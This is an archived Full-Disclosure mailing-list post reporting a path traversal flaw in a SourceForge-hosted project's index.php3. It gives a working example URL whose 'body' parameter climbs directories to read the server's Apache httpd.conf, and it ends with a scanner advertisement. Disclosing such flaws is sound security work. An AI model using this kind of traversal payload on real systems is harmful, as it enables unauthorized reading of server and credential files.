[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Vulnerability in sourceforge.net



Vulnerability in sourceforge.net.

Remote user can read any files. Example:

http://btmgr.sourceforge.net/index.php3?body=../../../../../../usr/local
/apache/conf/httpd.conf


------------------------------------------------------------------------
----------
www.Maxpatrol.com - MaxPatrol is a professional network security scanner
distinguished by its uncompromisingly high quality of scanning,
optimized for effective use by companies of any size (serving from a few
to tens of thousands of nodes).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html